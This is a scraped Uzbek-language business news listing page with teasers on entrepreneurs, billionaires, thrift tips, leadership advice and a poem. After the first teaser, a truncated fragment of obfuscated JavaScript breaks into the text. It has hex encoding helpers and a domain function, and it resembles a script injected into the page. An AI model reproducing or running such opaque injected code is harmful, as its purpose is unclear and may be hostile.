«BIZNESTRENER.UZ» бу – мамлакатимиз тадбиркор ва фермерлари ютуқларини кўрсатувчи кўзгу, «BIZNESTRENER.UZ» бу – хорижлик ишбилармонлар тажрибалари билан таништирувчи минбар, «BIZNESTRENER.UZ» бу – бой бўлишни истаганлар учун супер портал, «BIZNESTRENER.UZ» бу – тадбиркорлар ва инвесторларни боғлаб турувчи кўприк

Янгилик ҳақида маълумот
  • Кўрилди: 785
  • Муаллиф: Admin

11 ёшли бу қизалоқ сиздан кўра кўпроқ пул топади

Бўлим: Ёш тадбиркорлар

Техаслик Микейла Ульмер яқинда оилавий рецепт бўйича тайёрлайдиган BeeSweet деб номланувчи лимонадларини Техас, Оклахома, Арканзас ва Луизиана штатларидаги 55та магазинга етказиб бериш учун Whole Foods компанияси билан шартнома тузди. Дарвоқе, бу тадбиркорнинг ёши атиги 11да.

Ялпиз, зиғир уруғи ва асал қўшиб тайёрланадиган лимонад рецептини қизалоқ катта бувисидан ўрганган. Даромадининг бир кисмини Микейла асалариларни кўпайтириш билан шуғулланадиган ташкилотларга беради. Ширин лимонад тайёрлаб сотиш ғояси унинг миясига тўрт ёшлик пайтида келган. У асал қандай олинишини ўрганар экан, асалариларнинг экотизимда қанчалик муҳим роль ўйнашларидан ҳайратда қолган.

//o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "biznestrener.uz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Янгилик ҳақида маълумот
  • Кўрилди: 1317
  • Муаллиф: Admin

“Duty free” асосчисининг ҳаётий тамойиллари

Бўлим: Машхурлар хаёти

 Чак Фини — унчалик ҳам таниқли бўлмаган инсон. Унинг бойлиги 7,5 миллиард доллар деб баҳоланса-да, унинг шахсий  автомобили йўқ ва ижарага олинган уйда истиқомат қилади. Финини кўрган одам уни оддий сайёҳ деб ўйлайди, чунки  у оддий кийинади. Лекин буларнинг барчасининг ортида унинг ўзига хос тарихи мужассам: у бутун ҳаётини хайрия  ишларига бағишлаган.

 Биз Чак Финининг ҳаёт ва пул ҳақидаги фикрларини эътиборингизга ҳавола этамиз.

 

  •  Мен сарфлаган пулинг одамларга ёрдам берса, масалан, бирор касалхона қурилса, буни кўриб беҳад завқланиш  мумкинлигига ами бўлдим. Мантиқан ҳам пулни банкка қўйгандан кўра яхши ишларга сарфлаш тўғрироқ бўлади.
  •  Мен пулни ёқтирмайман демайман, фақат менда сарфлашим учун етарли пул бўлса бўлди.
Янгилик ҳақида маълумот
  • Кўрилди: 3715
  • Муаллиф: Admin

Обрўли бўлишнинг 20 қоидаси

Бўлим: Машхурлар хаёти

1-Одамларни қилган ишига шахсий фикрингизни билдиринг, масалан: «Бу иш мақул, ёки бу жуда хунук иш бўлибди…» ва ҳкз каби фикр билдиринг
2-Шошилмай Секин гапиринг, аммо тез фикрланг
3-Ҳеч кимдан нарса сўраманг, айниқса сиздан кучли одамлардан…
4-Одамларни исмига этиборли бўлинг, кўришганда исми билан мурожаат қилинг.
5-Гапираётганингда суҳбатдошингни кўзига қараб гапиринг. Чунки кўзни қочириш қўрқоқликни маълум қилади…
6-Унутманг! Буюк одам ғоялар ҳақида гапиради, Оддий одам воқеалар ҳақида гапиради, Нодон одам одамлар ҳақида гапиради…. Дастурхон атрофида ёки бошқа даврада ҳеч қачон бировни ҳаётини муҳокама қилманг.
Янгилик ҳақида маълумот
  • Кўрилди: 1655
  • Муаллиф: Admin

Яхши раҳбар бўлай десангиз. . .

Бўлим: Ёш тадбиркорлар

1. Ишни ҳамсуҳбатингизни мақташдан ва унинг яхши жиҳатларини самимий эътироф этишдан бошланг.

2. Ўзгаларнинг хатосини тўғридан-тўғри эмас, балки билвосита кўрсатинг.

3. Даставвал ўз камчилик, нуқсонларингиз ҳақида гапиринг, сўнгра ҳамсуҳбатингизни танқид қилишга киришинг.

4. Ҳамсуҳбатингизга буйруқлар бериш ўрнига унга саволлар беринг.

5. Одамларга ўз обрў-эътиборларини сақлаб қолишга имкон беринг.

6. Одамларнинг жуда кичик бўлса ҳам муваффақиятини эътироф этинг, маъқулланг, ҳамда ҳар бир ютуғини қайд этинг. «Баҳолашда самимий ва мақтовда бағри кенг бўлинг».

7. Одамларга яхши обрў-эътиборга сазовор бўлишлари учун имкон яратинг, токи улар буни оқлашга ҳаракат қилишсин.

8. Рағбатлантиришга урининг.Шундай тгсаввур уйғотингки, хатога йўл қўйган киши хатосини енгил тарзда тўғрилайдиган, тузалган деб ҳис этсин; одамларни енгил деб ишга уринишга унданг.

9. Шунга эришингки, одамлар сиз тавсия этган ишларни бажарганларидан хурсанд бўлишсин.

Янгилик ҳақида маълумот
  • Кўрилди: 2158
  • Муаллиф: Admin

Дунё бойларидан пулни тежаш борасидаги тавсиялар

Бўлим: Машхурлар хаёти

Ҳар биримиз пулни имкон қадар тежаб ишлатишни истаймиз.Ким пулни ҳақиқатдан ҳам ўз ўрнида тежаб ишлатади? Албатта, пули кўплар. Қуйида дунё бойларининг бу борадаги тавсияларини келтириб ўтамиз.

Майкл Блумберг, маблағи: $34,3 миллиард

"Ўзингизга қулай бўлган буюм харид қилинг”. Bloomberg халқаро ахборот компанияси акционери Майкл Блумберг сўнгги 10 йилдан бери паст пошнали, қулай мокасина кияди. У бир чеккада ётадиган ва ҳеч қачон киймайдиган қимматбаҳо оёқ кийимларга пулини сарфламайди.

Билл Гейтс, маблағи: $79 миллиард

"Ўтмишдаги хатоларингиздан тўғри хулоса чиқаринг”. Хато қилиш-инсонга хос одат. Пул билан боғлиқ хатоларни ҳам шу жумлага киритиш мумкин. Бир куни Билл Гейтс шундай деган эди: "Муваффақиятдан завқланиш-яхши, аммо муваффақиятсизликлардан тегишли хулоса чиқариш ундан-да муҳимроқ”.

Янгилик ҳақида маълумот
  • Кўрилди: 1240
  • Муаллиф: Admin

«Раҳмат!» билан бизнесни қувватлаш сири

Бўлим: Тадбиркорлик фаолияти

Бир йилда фақат бир кун раҳмат айтишга бағишланган бўлиши мумкин. Лекин мунтазам равишда миннатдорчилик билдириш — йил давомида — ва буни сидқидилдан қилиш энг муваффақиятли бизнес стратегияларингиздан бирига айланиши мумкин. Кетма-кет амалга оширилган тадқиқотлар ошкор қиладики, мижозларга «Раҳмат сизга!» деганингизда улар янада кўпроқ пул сарфлаб, зъ дўстларига сиз кўрсатган хизматлар ва таъминлаган маҳсулотларнинг қанчалик ўзига хос эканлиги ҳақида сўзлаб, сизнинг даромадингизни оширишади. Миннатдорчилик билдирилганда ишчиларнинг меҳнат унумдорлиги ошиб, ишлаб чиқариш ҳажми кўтарилади ва сизнинг фойдангиз ўсади. Таъминотчилар нафақат ноябр ойида, балки доимий равишда раҳмат эшитганларида сизга имкон қадар истисноларга бориб, ўз маҳсулотларини «айни керак пайтда» етказиб беришади ва бу орқали сизнинг нақд пулларингиз оқиб туришда давом этади.
Янгилик ҳақида маълумот
  • Кўрилди: 1664
  • Муаллиф: Admin

Пул ҳақида икки оғиз гап

Бўлим: Бош сахифа

Одам маблағ нимага кераклигини билса, қандай яхши! Шуниси ёмонки, пул ҳамма нарсани ўлчаш кўрсаткичига айланиб қолиши мумкин. Ёки уни йиғиш мақсадга айланиб, кишини ўзига бўйсунтирса, бундан ёмони йўқ. Ёдингизда тутингки, пул ҳаётда уни муҳим деб санамайдиганларга кўпроқ бахт келтиради. Пулга бўлган муносабат болаликдан бошланади. Ота-онамиз ундан қандай фойдаланишга йўл қўйиб берган бўлса, пулга муносабатни шундай қабул қиламиз. Болаларингиз келажакда молиявий танқисликка дуч келмасликлари учун уларга пулни яхши ва фойдали, деб қарашга (албатта, бунда уларни бурчакка турғазиб қўймасдан!) ўргатиш керак. Боланинг олдида пул ҳақида ёмон маълумотлар келтирманг, агар манфаатпараст кишилар ҳақида сўз юритмоқчи бўлсангиз, уларнинг ёмон иллатини пардалироқ қилиб тасвирланг. Бунда сиз одамнинг бойликка ёпишиб олганига шаъма қилинг, лекин пулни яхши кўриш ёмон эканига эмас.
Янгилик ҳақида маълумот
  • Кўрилди: 2191
  • Муаллиф: Admin

Юз йил рангини йўқотмаган “қоғоз”

Бўлим: Бош сахифа

Турли даврлардан турлича кўринишларда бизгача етиб келган бу "қоғоз”ни бугун кўрмаган, билмаган одам бўлмаса керак. Узун инглизча ибора "piese of Eight”, яъни 1/8 (нимчорак) қоғозда ўчирилиб, 8 га айланган доллар белгиси ҳам ҳаммага маълум. Бироқ... бир пайтлар машҳур шахслардан бири "Янги Америка ўзининг янги пулига жуда эски ном танлади” деган эди.

 

ФРАНКЛИН ПРЕЗИДЕНТ ЭМАС

Доллар банкноталарида АҚШ президентларининг портретлари туширилган. Лекин 100 доллардаги Б.Франклин ҳеч қачон президент бўлмаган. У бундай шарафга АҚШнинг асос солинишида иштирок этиб, мустақиллик декларациясини имзолаганлиги учун сазовор.
Доллардаги пирамида нима: 13 та зина поғона давлатнинг биринчи 13 штатини билдиради, пирамиданинг тепа қисми йўқлиги эса мустақил давлатларнинг ривожланиши ҳеч қачон якунланмайди.
Яна бир қизиқарли жиҳат шундаки, баъзи америка штатлари ўзларининг алоҳида валюталарига эга. Итака, Траверс Сити, Корвалис, Орегон, Мэдисон каби штатлар ўз "шахсий” пулини хоҳлашган.

 

 

Янгилик ҳақида маълумот
  • Кўрилди: 2339
  • Муаллиф: Admin

Нолишни бас қил! Ҳаракат қил!

Бўлим: Тадбиркорлик фаолияти

Янгилик ҳақида маълумот
  • Кўрилди: 1703
  • Муаллиф: Admin

Фаррош бўлолмаган бизнесмен

Бўлим: Тадбиркорлик фаолияти

 

Бир киши "Microsoft” компаниясига фаррош бўлиб ишлаш учун келибди. Кадрлар бўлимида у бир нечта тестлардан, суҳбатдан ўтибди ва унга дейишибди:

— Табриклаймиз, сизни ишга қабул қиламиз. Бизга ўз e-mailингизни қолдиринг, иш жадвали ҳақида маълум қиламиз.

— Кечирасиз, менинг компьютерим йўқ,– дебди бояги киши, – электрон почтам ҳам йўқ.

— Афсуски, у ҳолда сизни ишга қабул қилолмаймиз. "Microsoft”нинг барча ходимлари билан e-mail орқали алоқа қиламиз ва ишимизнинг асосий қисми компьютерлар билан боғлиқ. Шунинг учун сизни ишга ололмаймиз.

Бечора киши ташқарига йўл олибди ва компьютер учун қандай қилиб пул топишни ўйлай бошлабди. Чўнтагида атиги 30 доллар пули бор экан. Қараса, нарироқда бир фермер боғидан териб келган олмаларини сотаётган экан. У 10 кило олма сотиб олибди ва гавжум кўчалардан бирига бориб олма сота бошлабди. Икки соатда унинг пули икки баробар, олти соатдан кейин эса 10 баробарга кўпайибди. У "Microsoft”га ишга кирмасдан ҳам яшаш мумкинлигини тушунибди.

Янгилик ҳақида маълумот
  • Кўрилди: 2519
  • Муаллиф: Admin

Россиядаги энг бой ўзбек 62 ёшда

Бўлим: Машхурлар хаёти

Кеча, 9 сентябрь куни россиялик бизнесмен, федерациянинг энг бой одами, асли ўзбекистонлик Алишер Усмонов 62 ёшга тўлди. Рус интернетининг энг йирик лойиҳалари – Мейл.ру, ВКонтакте ва Одноклассники бугунги кунда унга тегишлидир. Айнан унинг инвестициялари туфайли Россиянинг маҳаллий ижтимоий тармоқлари йирик халқаро лойиҳаларга айланди.

Алишер Усмонов Ўзбекистонда дунёга келган. 30 ёши арафасида у Россияга кетди ва у ерда узоқ йиллар меҳнат қилди. Бу меҳнатнинг самараси ўлароқ у бугунги кунда Россиянинг энг бой одамига айланди.


Янгилик ҳақида маълумот
  • Кўрилди: 1287
  • Муаллиф: Admin

Шишадан 7,7 миллиардлик даромад

Бўлим: Машхурлар хаёти

Хитойлик Чжоу Цюньфэй оиласига ёрдам бериш мақсадида 15 ёшида ишлашни бошлаган, 45 ёшида эса мамлакатнинг энг бой аёлига айланди. Бугунги кунда у қиймати 9,7 миллиард АҚШ долларини ташкил қилган Lens Technology компанияси раҳбари ҳамда 7,7 миллиард АҚШ долларига эга бўлган бадавлат аёлдир.

Хитойлик Чжоу Цюньфэй self-made миллиардерларнинг классик йўлини босиб ўтган: 15 ёшида вилоят шиша фабрикаси конвейерида ишлашни бошлаган, ҳозир у 45 ёшда ва унинг маҳсулотига Apple ҳамда Samsung компаниялари томонидан талаб катта, у 7,7 миллиард долларлик даромади билан жаноб Ричард Брэнсон ҳамда Uber асосчиси Трэвис Каланикникидан ўзиб кетган.

Чжоунинг бойлиги Forbes рўйхатига киритилган бошқа хитойлик миллиардерларники каби компаниясига тегишли бўлган акциялар қийматига боғлиқ. Хитой фонд бозорининг июнь ойи ўрталарида кутилмаганда 30 фоизга пасайиши Lens Technology котировкаларини ҳам ўзи билан пастга тортди, натижада акциялар 21 фоизга тушиб кетди (Bloomberg терминалининг 9 июлдаги маълумотларига кўра). Шу туфайли Чжоу Цюньфэй бу ҳафталар мобайнида Bloomberg Billionaires индексида 4,8 миллиард АҚШ долларини йўқотди. Шунга қарамай, Lens акцияларининг нархи тўрт ой олдин ўтказилган IPO нархига қараганда 383 фоизга баланд кўрсаткичда қолмоқда, кичик ёшидан муваффақиятсизликларга кўниккан компания эгаси эса бир йил аввалгига қараганда 5,5 миллиард долларга бойроқ (Bloomberg маълумотларига кўра).

Янгилик ҳақида маълумот
  • Кўрилди: 650
  • Муаллиф: Admin

Келасиз деб эшитдим...

Бўлим: Шеърлар

Келасиз деб эшитдиму, орзиқиб кетдим,

Бошда ғаму ташвишларни буткул унутдим.

Келмасангиз менинг учун минг битта ғамдур,

Минг илтижо, тилак билан интизор кутдим.

Оппоқ тонг ҳам отаяпти, менинг оқ тонгим...

Наҳотки, Сиз... тушимми – ё, келмас ишонгим.

Неча йиллик армонимсиз, бахт эса гумон –

Нетайки, оч шубҳадан ҳам келмайди тонгим.

Янгилик ҳақида маълумот
  • Кўрилди: 1862
  • Муаллиф: Admin

Ҳаётда муваффақиятга эришай десангиз…

Бўлим: Ёш тадбиркорлар

Бугунги кун одамидан муваффақиятга эришиш учун юқори самарадорлик талаб қилинади. Аслида ҳар қандай киши самарадорликка эришиши мумкин. Бироқ инсон ўзига ўзи ҳалақит беради. Хўш, қандай қилиб? Мақолани ўқинг ва ўзингизга мос жиҳатларини топинг!
Атрофингиздагилар ҳамма ишга улгуради, сиз эса бундан мустасно. Таниш ҳолатми? Бир қарашда безарар, аммо секин-аста сизнинг омилкорлигингизни пасайтирувчи одатлар – бунинг асосий сабабчисидир. Ҳаётингизнинг ҳар дақиқасини оқилона сарфлаб, ҳамма нарсага улгуришни истайсизми? Унда мана бу рўйхатга бир назар ташланг. Бу рўйхатда самарадорликни оширишингиз учун қилишингиз керак бўлмаган ишлар мавжуд.
1. Ҳамма нарса билан бир вақтда шуғулланиш
Атрофингизда вақтингизни оладиганлар бор, бироқ ким айтибди уларга эътибор қаратинг деб? Агар сизга қўнғироқ қилишса, хабар жўнатишса ёки эшигингизни таққилатишса қилаётган ишингизни шу ондаёқ ташлаш керак эмас. Ишингиз билан боғлиқ бўлмаган нарсалар учун танаффус ажратилган.
Янгилик ҳақида маълумот
  • Кўрилди: 2021
  • Муаллиф: Admin

Асли ўзбекистонлик миллиардер Искандар Маҳмудов «Калашников»нинг хўжайинларидан бирига айланди

Бўлим: Тадбиркорлик фаолияти

Урал тоғ-металлургия компанияси асосчиси — асли ўзбекистонлик миллиардер Искандар Маҳмудов «Калашников» қурол-яроғ концерни акцияларининг 12 фоизини қўлга киритди, деб хабар бермоқда «Коммерсант».

Тадбиркор ушбу акцияларга тўғридан-тўғри эмас, балки бир нечта воситачи компаниялар орқали эгалик қилади. Маҳмудов акциялар пакетини сотиб олган «ТКХ-Инвест» компанияси «Транскомплектхолдинг»га эгалик қилади. Ўз навбатида, «Транскомплектхолдинг» «Калашников» акцияларининг 49 фоизига эгалик қилади — қолган 51 фоизи «Ростех» давлат корпорациясига тегишли.

Тегишли ўзгаришлар акциядорлик капиталида 7 май куни кузатилган. Ўша куни «Трансмашхолдинг» президенти Андрей Бокаревнинг «ТКХ-Инвест» компаниясидаги улуши 50 фоиздан 25 фоизгача камайган.

Орқага Олдинга